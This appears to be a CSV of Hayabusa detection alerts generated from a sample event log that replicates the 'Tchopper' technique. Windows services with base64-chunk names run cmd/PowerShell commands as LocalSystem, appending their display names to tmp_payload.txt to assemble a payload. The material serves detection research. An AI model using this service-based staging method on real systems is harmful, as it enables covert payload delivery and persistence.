start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:43.938 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:46.913 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UgSGlnaGVyIFRoZW4gUHJvZmlsZSBSYW5nZWBuIiANCiAgICAgICAgICAgICANCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gSGlnaCBFdmVudCBSYXRlIFNlcnZlciAxMjUwLTE4 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:48.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NzUgKDQxNi02MjUpDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HRSAyNTApIHsgDQogICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0gIkhpZ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:49.806 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ggRXZlbnQgUmF0ZSBTZXJ2ZXIgKDI1MS02MjUpIEVQUyINCiAgICAgICAgIH0NCiAgICAgICAgIA0KICAgICAgICAgIy0gVHlwaWNhbCBTZXJ2ZXIgNTAwLTc1MCAoMTY2LTI1MCkNCiAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:51.269 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IEVsc2VJZiAgKCRBdmdFdmVudHNQZXJTZWNvbmQgLUdFIDUwKSB7IA0KICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyArPSAiVHlwaWNhbCBTZXJ2ZXIgKDUxLTI1MCkgRV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:52.716 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQogICAgICAgICAjLSBEZWZhdWx0IChFbmRwb2ludCkgMTAwLTE1MCAoMzMtNTApDQogICAgICAgICBFbHNlSWYgICgkQXZnRXZlbnRzUGVyU2Vjb25k | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg68"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:54.170 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:54.170 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IC1HRSAwKSB7IA0KDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJbmZvICs9ICJXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTIg0KICAgICAgICAgfQ0KICAgICAgICAgDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg69"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:55.604 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAjIE5lZ2l0aXZlIG9yIHVucmVhZGJsZSBhbmQgY2FudCBiZSBkZXRlcm1pbmVkIA0KICAgICAgICAgRWxzZSB7DQogICAgICAgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg70"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
